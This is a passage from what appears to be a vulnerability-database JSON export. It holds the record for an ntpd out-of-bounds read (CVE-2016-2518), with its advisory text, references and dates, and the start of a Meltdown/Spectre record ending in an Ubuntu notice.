ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ne760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\naa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ndbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz\n\nSlackware x86_64 -current package:\n7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-7977 / CVE-2015-7978\n\n Stephen Gray discovered that a NULL pointer dereference and a\n buffer overflow in the handling of \"ntpdc reslist\" commands may\n result in denial of service. \n\nCVE-2016-2518\n\n Yihan Lian discovered that an OOB memory access could potentially\n crash ntpd. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:4.2.6.p5+dfsg-7+deb8u2. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1:4.2.8p7+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:4.2.8p7+dfsg-1. \n\nWe recommend that you upgrade your ntp packages", "sources": [ { "db": "NVD", "id": "CVE-2016-2518" }, { "db": "CERT/CC", "id": "VU#718152" }, { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "BID", "id": "88226" }, { "db": "VULMON", "id": "CVE-2016-2518" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" } ], "trust": 3.24 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#718152", "trust": 3.6 }, { "db": "NVD", "id": "CVE-2016-2518", "trust": 3.4 }, { "db": "BID", "id": "88226", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "136864", "trust": 1.8 }, { "db": "SECTRACK", "id": "1035705", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-211752", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-21-159-11", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU95781418", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU91176422", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-007714", "trust": 0.8 }, { "db": "CS-HELP", "id": "SB2021061008", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201604-609", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2016-2518", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138984", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138162", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137992", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137244", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138052", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2518" }, { "db": "BID", "id": "88226" }, { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-2518" }, { "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "id": "VAR-201701-0399", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.33987721 }, "last_update_date": "2023-12-18T11:47:58.135000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Oracle\u00a0Solaris\u00a0Third\u00a0Party\u00a0Bulletin\u00a0-\u00a0April\u00a02016", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug3009" }, { "title": "ntpd Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61292" }, { "title": "Red Hat: CVE-2016-2518", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2518" }, { "title": "Amazon Linux AMI: ALAS-2016-708", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-708" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3096-1" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=85311fa037162a48cd67fd63f52a6478" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2518" }, { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-125", "trust": 1.0 }, { "problemtype": "Out-of-bounds read (CWE-125) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "NVD", "id": "CVE-2016-2518" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "https://www.kb.cert.org/vuls/id/718152" }, { "trust": 2.8, "url": "http://www.debian.org/security/2016/dsa-3629" }, { "trust": 2.5, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "trust": 2.3, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-159-11" }, { "trust": 2.1, "url": "https://access.redhat.com/errata/rhsa-2016:1141" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160428-ntpd" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1552.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-3096-1" }, { "trust": 1.7, "url": "http://support.ntp.org/bin/view/main/ntpbug3009" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/88226" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1035705" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20171004-0002/" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:16.ntp.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-211752.pdf" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00034.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00037.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2016-05/msg00114.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00026.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00042.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/archive/1/538233/100/0/threaded" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00052.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00020.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00001.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/538233/100/0/threaded" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/136864/slackware-security-advisory-ntp-updates.html" }, { "trust": 1.7, "url": "https://support.f5.com/csp/article/k20804323" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183647.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/184669.html" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#january_2016_ntp_4_2_8p6_securit" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91176422/" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu95781418/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2518" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021061008" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1548" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1550" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2518" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-2518" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023885" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024157" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021521" }, { "trust": 0.3, "url": "http://support.ntp.org/bin/view/main/ntpbug3009 " }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983803" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985122" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986956" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988706" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989542" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory7.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2516" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7979" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-1547" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-1548" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-1550" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/125.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3096-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4956" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0727" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4954" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.10" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4955" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.11" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.3" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2516" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1551" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2517" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1547" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8138" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2518" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1551" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1550" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2517" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1548" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2518" }, { "db": "BID", "id": "88226" }, { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-2518" }, { "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-2518" }, { "db": "BID", "id": "88226" }, { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-2518" }, { "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-27T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-01-30T00:00:00", "db": "VULMON", "id": "CVE-2016-2518" }, { "date": "2016-04-26T00:00:00", "db": "BID", "id": "88226" }, { "date": "2017-03-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "date": "2016-10-05T22:33:00", "db": "PACKETSTORM", "id": "138984" }, { "date": "2016-08-03T18:16:52", "db": "PACKETSTORM", "id": "138162" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2016-05-31T13:33:49", "db": "PACKETSTORM", "id": "137244" }, { "date": "2016-05-02T21:38:58", "db": "PACKETSTORM", "id": "136864" }, { "date": "2016-07-26T19:19:00", "db": "PACKETSTORM", "id": "138052" }, { "date": "2017-01-30T21:59:01.080000", "db": "NVD", "id": "CVE-2016-2518" }, { "date": "2016-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-28T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2021-06-10T00:00:00", "db": "VULMON", "id": "CVE-2016-2518" }, { "date": "2016-11-24T01:07:00", "db": "BID", "id": "88226" }, { "date": "2021-06-10T09:03:00", "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "date": "2021-06-10T13:15:07.937000", "db": "NVD", "id": "CVE-2016-2518" }, { "date": "2021-06-11T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "CNNVD", "id": "CNNVD-201604-609" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP.org ntpd contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#718152" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-609" } ], "trust": 0.6 } }
var-201801-1712
Vulnerability from variot
Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. Two vulnerabilities are identified, known as "Variant 3a" and "Variant 4". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \"melts\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \"cross-border\" access to system-level memory, causing data leakage. Multiple CPU Hardware are prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Xeon CPU E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4 ; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Relevant releases/architectures:
Image Updates for RHV-H - noarch
- These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. ========================================================================== Ubuntu Security Notice USN-3540-2 January 23, 2018
linux-lts-xenial, linux-aws vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
Summary:
Several security issues were addressed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS. This flaw is known as Spectre. (CVE-2017-5715, CVE-2017-5753)
USN-3522-2 mitigated CVE-2017-5754 (Meltdown) for the amd64 architecture in the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS. This flaw is known as Meltdown. (CVE-2017-5754)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
